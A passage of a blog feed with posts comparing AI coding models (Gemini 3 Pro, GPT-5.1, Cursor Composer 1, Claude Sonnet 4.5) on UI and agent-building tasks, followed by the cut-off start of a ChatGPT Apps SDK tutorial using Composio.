  1. UI Test - Clone Windows 11
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/b394169b45a1f8da947da6dcec18dc70" rel="noopener noreferrer"&gt;Prompt - UI Test&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/3f82d6037608b5212df462ea993ba231" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Y8hQdr54AZ0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is by far the best response I've gotten from any AI model to this prompt to date. This is just too good. The overall feel does resemble Windows 11. The choice of icons could have been better, but the overall look and feel are really, really close.&lt;/p&gt;

&lt;p&gt;On this question, I'm not looking at how the model implements logic, but rather its pure frontend skills, and this one has done it well. Also, the wallpaper-changing feature is cool and works.&lt;/p&gt;

&lt;p&gt;It took about 10 minutes to implement it all. The total output token usage was around 30K, including the README, LICENSE, and a few other document files it generated on its own. So, be careful when using YOLO mode in Gemini CLI. 😑&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" alt="Gemini 3 token usage coding UI problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1 codex:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/e8ec4a2072f15aa14fef9cfde65ec439" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/09WhZpqVl-U"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is super close to Gemini's implementation, but there's a lot of stuff that feels missing and could be improved.&lt;/p&gt;

&lt;p&gt;Even though the look and feel of the output from Gemini 3 Pro is much better, the code for this question by this model is better than that of Gemini 3 Pro. If you look into how it's structured, how types are declared, and all that, this is much better.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Building a Calendar Agent
&lt;/h3&gt;

&lt;p&gt;To build the agent, let's use something different. This time, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/7b44bd642c470d4a0e76343721a6e05b" rel="noopener noreferrer"&gt;Prompt - Agent Coding&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/595a4570477bee4c99c4872f0801037d" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/N6-iAr6Zu5I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This works. It's not the best implementation with the best-written code style, but it simply works. Minimal yet functional. It's fascinating how well this model understands the context from the provided link and finds all the pieces it needs to put together.&lt;/p&gt;

&lt;p&gt;There are still many type issues and a few code implementation issues, but all in all, it's hanging by a small thread, yet surprisingly, it just works.&lt;/p&gt;

&lt;p&gt;In terms of time, it took about &lt;strong&gt;5 minutes&lt;/strong&gt; to build this entire agent. And, just to be clear, it's not a one-shot; I had to help it with a little bit of setup.&lt;/p&gt;

&lt;p&gt;The entire test took around 14K output tokens, and since the prompt I gave is very verbose, the input token count is significantly higher.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" alt="Gemini 3 token usage coding agent problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program it got me first:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/O4lknG9RzbM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;For real, it just mocked the entire agent route. There's no composio tool router used. This is so depressing. All it did was create the UI and mock the whole agent implementation.&lt;/p&gt;

&lt;p&gt;You can find the agent route code that it generated here: &lt;a href="https://gist.github.com/shricodev/0733c30fb7f90a5cf15ebb3227ddeecf" rel="noopener noreferrer"&gt;Link&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, I had to copy and paste some parts of the tool router documentation manually, and with a lot of hand-holding this time and showing the Gemini 3 code as a reference, I got it somewhat working. But still, the UI is messed up, and the cards don't show.&lt;/p&gt;

&lt;p&gt;Here's the final output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Rz7tr5rQS2w"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/c2918c741dce9dbd2288b7c39b45cfa5" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" alt="OpenAI GPT-5.1 usage coding the agent"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Gemini 3 Pro kind of lived up to the hype in these tests. As for the code quality, both completed the test in one go for the most part, and the code is modular and follows best practices. However, sometimes GPT-5.1 provided much better code than Gemini 3 Pro. 🤷‍♂️&lt;/p&gt;

&lt;p&gt;This model Gemini 3 is a lot better in agent-styled workflows, and even the UI, and it shows. Really looking to see how the Deep Think mode improves things once it rolls out.&lt;/p&gt;

&lt;p&gt;If you're still curious to learn more, there's one blog that I recommend that you go through, "&lt;a href="https://www.oneusefulthing.org/p/three-years-from-gpt-3-to-gemini" rel="noopener noreferrer"&gt;Three Years from GPT-3 to Gemini 3&lt;/a&gt;" by Ethan Mollick, that walks you through the whole AI arc in these years and gives you some intuition on what's changed, beyond just the benchmark numbers.&lt;/p&gt;

&lt;p&gt;It's still early, and results may vary with different prompts, but for practical coding tasks, Gemini 3 Pro is a top model.&lt;/p&gt;

&lt;p&gt;Try it with your own projects and you will see what I mean. Share your results if you test it on something real. ✌️&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>🧠 Cursor Composer 1 vs Claude 4.5 Agent Build Comparison ⚡</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 12 Nov 2025 13:45:23 +0000</pubDate>
      <link>https://forem.com/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</link>
      <guid>https://forem.com/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</guid>
      <description>&lt;p&gt;The AI coding race is heating up again. After OpenAI, Anthropic, and Google, Cursor has stepped into the game with its new model, Composer 1, a coding-focused agent model that’s said to be 4x faster than other models with similar intelligence. 🤨&lt;/p&gt;

&lt;p&gt;It’s said to output code at lightning speed, reason through large contexts, and even outperform models like GPT-5 and Claude Sonnet in engineering workflows.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" alt="Sus GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s a bold claim, so I decided to test it myself. In this post, we’ll see how Composer 1 performs when building an actual agent and to make things fair, I’ll put it head-to-head with Claude Sonnet 4.5, one of the most consistent coding models out there.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the results, here’s a quick rundown of how both models performed in building a simple agent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Composer 1&lt;/strong&gt; produced the most complete implementation and had the fastest output. It coded the entire agent in under 3 minutes, though it needed two small follow-ups.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.5&lt;/strong&gt; also got the job done, but sometimes used outdated API methods, even though I clearly provided the latest documentation for a Python package. It tends to rely more on its training data than the instructions you give it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In terms of code quality and implementation, there’s not much difference. That said, Sonnet 4.5 burned almost twice the tokens, while Composer 1 delivered similar results in half the time (not 4x) with far fewer tokens. It’s efficient, fast, and feels like a strong pick for everyday coding.&lt;/p&gt;




&lt;h2&gt;
  
  
  Brief on Cursor Composer
&lt;/h2&gt;

&lt;p&gt;Since this model dropped only a few weeks ago, here’s a short refresher.&lt;/p&gt;

&lt;p&gt;Composer 1 is the first agent-focused coding model from Cursor. They claim it’s about &lt;strong&gt;4x faster&lt;/strong&gt; than similarly intelligent models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" alt="Cursor Composer 1 Bench Score"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(By the way, what even is the &lt;strong&gt;Cursor Bench Score&lt;/strong&gt;? Can't really trust all the metrics blindly. 🤷‍♂️)&lt;/p&gt;

&lt;p&gt;It is said to be a mixture-of-experts (MoE) language model supporting long context generation and understanding. As mentioned earlier, it's built especially for building agents or general software engineering workflows in mind through Reinforcement Learning (RL).&lt;/p&gt;

&lt;p&gt;They've positioned it as a frontier coding model, with top-tier intelligence that seems to surpass all its peer models with similar intelligence. It comes with a &lt;strong&gt;250 tokens per second&lt;/strong&gt; output speed, which is roughly twice as fast as most coding models and about 4–5 times faster than some reasoning models.&lt;/p&gt;

&lt;p&gt;If we talk about the pricing, it's priced the same as GPT-5, which is &lt;strong&gt;$1.25&lt;/strong&gt; per million input and &lt;strong&gt;$10&lt;/strong&gt; per million output tokens, which is pretty affordable for what it promises.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" alt="Cursor Composer 1 pricing with other models table"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is clearly aimed at replacing models like GPT-5 and Claude Sonnet 4.5 for software development. Although it is said that these models beat Composer 1 in pure coding intelligence, they run much slower.&lt;/p&gt;

&lt;p&gt;So, we can say that Composer comes with a bit of an accuracy trade-off for a &lt;strong&gt;lot&lt;/strong&gt; of speed gain, which could be a great option for some but not for everyone.&lt;/p&gt;

&lt;p&gt;But all of these claims come from Cursor's own benchmark. It's up to you whether you decide to trust it or not. 🤷‍♂️&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Alright, enough talk. Let’s see how Composer 1 stacks up against Sonnet 4.5 in actual coding.&lt;/p&gt;

&lt;p&gt;Since Composer is pitched as an “agentic” model, I wanted to see how well it could handle building an AI agent from scratch.&lt;/p&gt;

&lt;p&gt;To build the agent, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡&lt;strong&gt;Fun Fact:&lt;/strong&gt; Tool Router is what powers complex agentic products like &lt;a href="https://rube.app" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;h3&gt;
  
  
  What's the plan?
&lt;/h3&gt;

&lt;p&gt;I asked both models to build a small Python agent that takes a YouTube URL, finds the interesting parts of the video, and posts a Twitter thread on behalf of the user.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; "Create an AI Agent in Python when given a YouTube URL, The agent will find the interesting part of the video and post a tweeter thread on behalf of the user. For this, use the Composio's Tool Router: &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;https://docs.composio.dev/docs/tool-router/quick-start&lt;/a&gt;. Note: Don’t use Composio’s YouTube Integration, build a custom tool on your own using the YouTube Transcript API (to make things a little harder)."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Composer 1
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/aada89ce44f833a62fd41368d770b4c7" rel="noopener noreferrer"&gt;Composer 1 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/zoJu535wWBY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Composer was really fast with the response. Took a little over 3 minutes to code the first response, it did run into a small issue with the implementation of the YouTube transcript function, and adding it as a custom tool to the agent.&lt;/p&gt;

&lt;p&gt;It did also run into usage of some types and functions from the modules, but nothing much severe here.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" alt="Cursor Composer 1 agent with code errors"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But after a few back and forth in two more prompts with a little help from my side, it was able to make all of it work.&lt;/p&gt;

&lt;p&gt;In the overall, Composio part working with the Tool Router, it didn't really run into any problems.&lt;/p&gt;

&lt;p&gt;Token usage was around &lt;strong&gt;200K&lt;/strong&gt; tokens. For the timing, the first response took roughly 3 minutes, but on the follow-ups, it was negligible.&lt;/p&gt;

&lt;p&gt;It was not asked, but it did quite a good job with the code quality and the overall user interface of this CLI chat.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 One thing I found a bit irritating is the number of comments it writes; there's a comment for every single line, which is insane! For many, it could be great, but this definitely feels a bit too much.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Sonnet 4.5
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/30b9218148df4bc35080336824f85b5e" rel="noopener noreferrer"&gt;Claude Sonnet 4.5 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/4BJKeZfCe1M"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Sonnet kinda disappointed me here. The code quality was fine, yet it repeatedly used the old YouTube Transcript API methods (&lt;code&gt;get_transcript&lt;/code&gt;, &lt;code&gt;list_transcripts&lt;/code&gt;) even after being shown the newer version.&lt;/p&gt;

&lt;p&gt;I eventually had to fix that part myself. And for some reason, whenever I asked for a small change, Sonnet rewrote half the working code, which felt unnecessary and ate up tokens like crazy.&lt;/p&gt;

&lt;p&gt;Its total token usage was nearly double that of Composer’s, around &lt;strong&gt;427K tokens&lt;/strong&gt;, and it took between about 10 minutes to finish the job.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" alt="Claude 4.5 Sonnet cost to build the agent"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be fair, its implementation of the Tool Router itself was solid but quite a bit slower and heavier overall.&lt;/p&gt;

&lt;h3&gt;
  
  
  Summary
&lt;/h3&gt;

&lt;p&gt;To summarize the results, there's not much difference I could find in the code quality or the implementation, both were able to read the Tool Router documentation and implement it well. But for some reason, it was getting tough to make Sonnet use the new API than what it's trained on.&lt;/p&gt;

&lt;p&gt;Token usage and the time they took to implement are just &lt;strong&gt;not comparable&lt;/strong&gt;. Claude used 427K tokens, which is &lt;strong&gt;2.1 times&lt;/strong&gt; the tokens used by Composer 1, which is roughly 200K. In terms of time, there's a significant difference, and I also had to do many more follow-ups for this compared to Composer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;This was a really quick test. You could ask it to add more features to the agent, and test both the model results, but I leave it to you. But even from this small run, Composer 1 stands out. ⚡&lt;/p&gt;

&lt;p&gt;With more than half the time and far fewer tokens, it matched or even slightly outperformed Sonnet 4.5 in overall coding quality.&lt;/p&gt;

&lt;p&gt;From my experience using it, I don’t think you’ll run into any major issues choosing Composer over Sonnet for everyday development. It’s fast, consistent, and honestly feels built for this exact kind of work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" alt="Thumbs up GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Would love to hear if anyone else has benchmarked this model with cool real world projects. ✌️&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>💡How to Build ChatGPT Apps with Widgets using the ChatGPT Apps SDK and Next.js 🥶⚡</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Mon, 03 Nov 2025 15:35:43 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-build-chatgpt-apps-with-widgets-using-the-chatgpt-apps-sdk-and-nextjs-104i</link>
      <guid>https://forem.com/composiodev/how-to-build-chatgpt-apps-with-widgets-using-the-chatgpt-apps-sdk-and-nextjs-104i</guid>
      <description>&lt;p&gt;With the recent release of ChatGPT apps, especially the ChatGPT Apps SDK, developers can now build apps that run directly inside ChatGPT. 🤯&lt;/p&gt;

&lt;p&gt;Currently, by default, OpenAI supports just the following apps: Booking.com, Canva, Coursera, Expedia, Figma, Spotify, and Zillow.&lt;/p&gt;

&lt;p&gt;In the coming days, they plan to support developer-submitted apps by opening submissions later this year. This is a big moment for everyone who uses ChatGPT, especially developers who can build their own apps, and for the over 800 million ChatGPT users who get to try them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm6e93pq6n7tp5gaildyc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm6e93pq6n7tp5gaildyc.png" alt="OpenAI statement on supporting developers app inside ChatGPT"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, you must know how to build your own apps with the ChatGPT Apps SDK. How cool would it be to create an app that supports over 500 apps and isn't limited to the default OpenAI-supported apps?&lt;/p&gt;

&lt;p&gt;That's precisely what we'll cover, from understanding the SDK and running the project locally to temporarily hosting it on Ngrok to access it in ChatGPT.&lt;/p&gt;

&lt;p&gt;So, without further ado, let's dive right in.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyuw9en0w9o0cxkg6kwo8.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyuw9en0w9o0cxkg6kwo8.gif" alt="Furious Kid Screaming"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;To quickly summarize what we'll cover in this blog post, here's what we'll go through:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What are ChatGPT apps and the Apps SDK?&lt;/li&gt;
&lt;li&gt;Installing Ngrok to host your localhost project on the internet with one command.&lt;/li&gt;
&lt;li&gt;How to use Rube to access OpenAI ChatGPT Apps.&lt;/li&gt;
&lt;li&gt;How to implement widgets in Next.js with ChatGPT Apps SDK + Rube MCP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you work with Next.js and want to learn how to build custom widgets for your ChatGPT Apps, this is the right place to start.&lt;/p&gt;




&lt;h2&gt;
  
  
  What is ChatGPT Apps and the Apps SDK
&lt;/h2&gt;

&lt;p&gt;ChatGPT Apps are third-party tools that you can run directly in your ChatGPT conversations. The best way to understand this is to think of it as a way to use these apps like Figma, Canva, Zillow, Spotify, and more, and do all sorts of work directly in them without ever leaving ChatGPT.&lt;/p&gt;

&lt;p&gt;To give you a better overview, these are some things you can do with ChatGPT Apps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Say "Spotify, create me a playlist for my study session," and it'll build you a nice playlist in Spotify and play it directly in your chat.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Say "Canva, create me a thumbnail for my blog post with this text," and it'll build you a nice thumbnail for your blog post.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You're seeing where this is headed. This is OpenAI's third attempt to make ChatGPT not just a chatbot, but an all-in-one platform with all apps directly available in it, so you never have to leave ChatGPT.&lt;/p&gt;

&lt;p&gt;The first two were custom GPTs, but they didn't work well with the users. However, this is a powerful, more flexible approach that, if adopted, could mean ChatGPT becomes your all-in-one platform.&lt;/p&gt;

&lt;p&gt;Well, then what's &lt;strong&gt;ChatGPT Apps SDK?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As the name suggests, it's pretty obvious; it's used to build apps that run inside ChatGPT. 🫠&lt;/p&gt;

&lt;p&gt;To add more context, it's an open-source toolkit from OpenAI built on top of MCP that lets developers create apps that run directly in ChatGPT.&lt;/p&gt;

&lt;p&gt;At a high level, this is how it works:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your app (e.g., Canva, Figma, etc.) runs as an MCP server that exposes its tools and input/output schemas directly to ChatGPT.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Now, ChatGPT can invoke those tools and, optionally, render the UI components you provide in a sandbox.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Building a ChatGPT App in Next.js with Widgets
&lt;/h2&gt;

&lt;p&gt;The source code mainly consists of basic React code, so I won't explain it from scratch here. It's a GPT app designed to display Google Calendar meeting details with widget support.&lt;/p&gt;

&lt;p&gt;This should be a good starting point for you. Feel free to build something similar for your use case with any apps you prefer.&lt;/p&gt;

&lt;p&gt;Begin by cloning the project repository using the command below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/shricodev/chatgpt-apps-sdk-demo-composio.git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Step-1: Set Up Composio
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ We'll use Composio to add integrations support to our application. You can choose any integration you like. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Before moving forward, you need to obtain a &lt;a href="https://platform.composio.dev/" rel="noopener noreferrer"&gt;Composio API key&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Go ahead and create an account on Composio, get your API key, and paste it into the &lt;code&gt;.env&lt;/code&gt; file in the root of the project.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffh6aay8ta2jd3phbmcnu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffh6aay8ta2jd3phbmcnu.png" alt="Composio Dashboard"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
